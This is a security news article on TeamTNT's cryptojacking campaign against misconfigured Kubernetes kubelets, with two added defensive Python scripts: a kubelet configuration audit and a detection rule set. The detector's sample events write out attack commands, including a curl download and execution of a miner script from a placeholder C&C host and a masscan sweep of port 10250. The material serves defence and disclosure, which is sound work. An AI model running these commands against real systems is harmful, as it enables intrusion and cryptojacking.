Researchers from Trend Micro disclosed that close to 50,000 IPs were compromised across multiple Kubernetes clusters in a cryptojacking campaign conducted by the TeamTNT group.
Kubernetes, developed and backed by Google, is one of the most widely adopted container orchestration platforms for automating the deployment, scaling, and management of containerized applications.
Clusters make an attractive target for threat actors because they are often misconfigured, especially those running primarily in cloud environments with access to nearly unlimited compute resources.
According to the analysis, close to 50,000 IPs were found to have been compromised by this TeamTNT attack across multiple clusters. Many IPs were repeatedly exploited during the timeframe, and the majority of the compromised nodes were located in China and the US.
How a Kubernetes Cluster Is Compromised
Previously, Trend Micro highlighted that TeamTNT was actively stealing AWS, Docker, and Linux Secure Shell (SSH) credentials, as well as waging cryptojacking attacks and placing backdoors, such as IRC bots and remote shells, inside Linux devices.
Researchers at Trend Micro analyzed one of the scripts they collected from a TeamTNT server. “TeamTNT at first wanted to disable the bash history on the target host and define environment variables for its command-and-control server, such as the script to install the crypto miner later and the binary of the XMRig Monero miner”, Trend Micro researchers say.
The script also installs two free, open-source tools available from GitHub: the network scanning tool masscan, written in C, and the deprecated banner-grabbing tool Zgrab, written in Go. The newer version, Zgrab2, is also open source and available on GitHub but is not installed by the script.
TeamTNT subsequently installs its Internet Relay Chat (IRC) bot. The bot is written in C and is stored in the /tmp folder under the name kube.c to avoid suspicion.
The bot code is compiled with the GNU Compiler Collection (GCC), and the source file is removed once compilation completes. The resulting binary is then moved to the /root folder and renamed to kube.
An IRC bot is a set of scripts or an independent program that connects to Internet Relay Chat as a client, so it appears to other IRC users as just another user. The IRC bot used by TeamTNT, written in C, is based on another well-known IRC bot called Kaiten. In the last part of the script, a function, kube_pwn(), uses masscan to check for any hosts with port 10250 open.
“Once the connection is established, the attackers then use the Masscan port scanner to scan the internal network of the targeted Kubernetes cluster to look for other unsecured or misconfigured Kubelet agents”, reads the analysis published by Trend Micro.
This port belongs to the kubelet API, and by default it is open on all nodes of a cluster, including control-plane and worker nodes. The kubelet is the agent that runs on each node and ensures that the containers in each pod are running. It is also the agent responsible for applying configuration changes on the nodes.
For each container running on each node, the script takes advantage of the /run endpoint of the kubelet API to run the following commands:
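The "unsecured or misconfigured kubelet agents" the campaign looks for are, in practice, kubelets whose port 10250 accepts anonymous requests and authorizes everything. The following audit script is an added example for this article, not code from Trend Micro or from the Kubernetes project: it checks a KubeletConfiguration document for the settings that make the /run endpoint reachable without credentials. The two configuration documents are constructed for the example (the kubelet accepts its configuration file as YAML or JSON; JSON is used here so only the standard library is needed), and the hostnames and CA path in them are placeholders.

```python
import json

# Constructed KubeletConfiguration documents for the example. The weak one
# mirrors the kind of kubelet an internal scan would find exploitable; the
# hardened one is what a cluster operator should be running.
WEAK_KUBELET_CONFIG = json.dumps({
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {"anonymous": {"enabled": True}},
    "authorization": {"mode": "AlwaysAllow"},
    "readOnlyPort": 10255,
})

HARDENED_KUBELET_CONFIG = json.dumps({
    "apiVersion": "kubelet.config.k8s.io/v1beta1",
    "kind": "KubeletConfiguration",
    "authentication": {
        "anonymous": {"enabled": False},
        "webhook": {"enabled": True},
        # Placeholder path; point this at the cluster CA that signs client certs.
        "x509": {"clientCAFile": "/etc/kubernetes/pki/ca.crt"},
    },
    "authorization": {"mode": "Webhook"},
    "readOnlyPort": 0,
})


def audit_kubelet_config(doc: str) -> list:
    """Return a list of findings for a KubeletConfiguration JSON document.

    An empty list means none of the checked weaknesses is present. Fields
    that are not set at all are reported too, because the effective default
    then depends on the kubelet version and on command-line flags, and that
    should be verified rather than assumed.
    """
    cfg = json.loads(doc)
    if cfg.get("kind") != "KubeletConfiguration":
        return ["document is not a KubeletConfiguration"]

    findings = []
    auth = cfg.get("authentication", {})

    # Anonymous authentication is what lets an unauthenticated scanner on the
    # node network talk to the kubelet API at all.
    anon = auth.get("anonymous", {}).get("enabled")
    if anon is None:
        findings.append("authentication.anonymous.enabled is not set; verify the effective value")
    elif anon:
        findings.append("authentication.anonymous.enabled is true: unauthenticated callers can reach the kubelet API")

    # Without webhook (token) or x509 client auth there is no way to prove a
    # caller's identity to the kubelet.
    if not auth.get("webhook", {}).get("enabled") and not auth.get("x509", {}).get("clientCAFile"):
        findings.append("no webhook or x509 client authentication is configured")

    # AlwaysAllow skips the API server's SubjectAccessReview, so every request,
    # anonymous ones included, is permitted on every endpoint.
    mode = cfg.get("authorization", {}).get("mode")
    if mode is None:
        findings.append("authorization.mode is not set; verify the effective value")
    elif mode == "AlwaysAllow":
        findings.append("authorization.mode is AlwaysAllow: every request is permitted, including exec-style endpoints")

    # The read-only port serves pod and node details with no authentication.
    ro_port = cfg.get("readOnlyPort")
    if ro_port is None:
        findings.append("readOnlyPort is not set; verify the effective value")
    elif ro_port != 0:
        findings.append(f"readOnlyPort {ro_port} exposes pod and node details without authentication")

    return findings


if __name__ == "__main__":
    for label, doc in (("weak", WEAK_KUBELET_CONFIG), ("hardened", HARDENED_KUBELET_CONFIG)):
        print(label, audit_kubelet_config(doc) or ["no findings"])
```

Run the audit against the configuration file each node's kubelet is actually started with (the path given to its --config flag), not against a template; the weak document above produces four findings and the hardened one produces none.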
1. Updates the package index of the container.
2. Installs the following packages: bash, wget and curl.
3. Downloads a shell script called setup_xmr.sh from the TeamTNT C&C server and saves it in the /tmp folder.
4. Executes the script to start mining for the Monero cryptocurrency.
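Each stage described above (the bot compiled from /tmp/kube.c and staged as /root/kube, masscan sweeping port 10250, and the package install, download and execution of setup_xmr.sh inside containers) leaves a process execution that a runtime monitor can record. The script below is an added example for this article, not detection content from Trend Micro: it runs a small rule set over constructed process-execution events and only raises a host when several distinct stages of the same playbook appear on it, which keeps a lone "apt-get install curl" from paging anyone. The event format, hostnames, container names and the C&C hostname (c2.invalid) are all constructed placeholders.

```python
import json
import re

# Constructed process-execution events, one JSON object per line, in the shape
# a generic process or container runtime monitor might emit. Not real telemetry.
SAMPLE_EVENTS = """
{"ts":"2021-05-20T10:01:02Z","host":"worker-1","container":"nginx-7d9","cmdline":"apt-get update"}
{"ts":"2021-05-20T10:01:05Z","host":"worker-1","container":"nginx-7d9","cmdline":"apt-get install -y bash wget curl"}
{"ts":"2021-05-20T10:01:09Z","host":"worker-1","container":"nginx-7d9","cmdline":"curl -s http://c2.invalid/setup_xmr.sh -o /tmp/setup_xmr.sh"}
{"ts":"2021-05-20T10:01:10Z","host":"worker-1","container":"nginx-7d9","cmdline":"bash /tmp/setup_xmr.sh"}
{"ts":"2021-05-20T10:03:00Z","host":"worker-1","container":"","cmdline":"gcc -o /tmp/kube /tmp/kube.c"}
{"ts":"2021-05-20T10:03:01Z","host":"worker-1","container":"","cmdline":"mv /tmp/kube /root/kube"}
{"ts":"2021-05-20T10:03:30Z","host":"worker-1","container":"","cmdline":"masscan 10.0.0.0/16 -p10250 --rate 10000"}
{"ts":"2021-05-20T10:05:00Z","host":"worker-2","container":"api-5f4","cmdline":"curl -s https://example.invalid/healthz"}
{"ts":"2021-05-20T10:06:00Z","host":"worker-2","container":"","cmdline":"gcc -o /usr/local/bin/tool /home/dev/tool.c"}
"""

# One rule per stage the article describes. Names are arbitrary labels chosen
# for this example.
RULES = [
    ("container-installs-download-tools",
     re.compile(r"\b(?:apt-get|apk|yum)\s+(?:install|add)\b.*\b(?:wget|curl)\b")),
    ("setup_xmr-dropped-to-tmp", re.compile(r"setup_xmr\.sh")),
    ("irc-bot-compiled-from-tmp", re.compile(r"\bgcc\b.*/tmp/kube\.c")),
    ("binary-staged-as-root-kube", re.compile(r"\bmv\b.*\s/root/kube\b")),
    ("masscan-for-kubelet-port",
     re.compile(r"\bmasscan\b.*(?:-p\s*|--ports?\s*)10250\b")),
]


def match_events(raw: str) -> list:
    """Return (host, rule_name, cmdline) for every event that matches a rule.

    An event may match more than one rule; each match is reported separately.
    """
    hits = []
    for line in raw.strip().splitlines():
        event = json.loads(line)
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                hits.append((event["host"], name, event["cmdline"]))
    return hits


def hosts_showing_chain(raw: str, min_indicators: int = 2) -> dict:
    """Map host -> sorted rule names, keeping only hosts where at least
    min_indicators distinct rules fired.

    A single hit is weak evidence on its own (a developer may legitimately
    install curl or compile something), but several stages of one playbook on
    the same node within a short window is what the campaign actually looks
    like from the host's point of view.
    """
    per_host = {}
    for host, name, _ in match_events(raw):
        per_host.setdefault(host, set()).add(name)
    return {h: sorted(r) for h, r in per_host.items() if len(r) >= min_indicators}


if __name__ == "__main__":
    for host, rules in hosts_showing_chain(SAMPLE_EVENTS).items():
        print(f"{host}: {len(rules)} stages observed -> {', '.join(rules)}")
```

On the constructed events, worker-1 trips all five rules and is reported, while worker-2, whose only activity is a health check and an ordinary compile, is not. The regexes are deliberately tied to the specific file names and port the article reports, so they are brittle against a retooled campaign; they are meant to show the correlation idea, not to replace a maintained rule set.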
Researchers note that the constant use of cryptojacking and credential stealing indicates that these will remain in the threat actor’s primary collection of techniques for the near future.
The high number of targets shows that TeamTNT is still expanding its reach (especially in cloud environments) and perhaps its infrastructure, since the group can monetize more from its campaigns when it has more potential victims.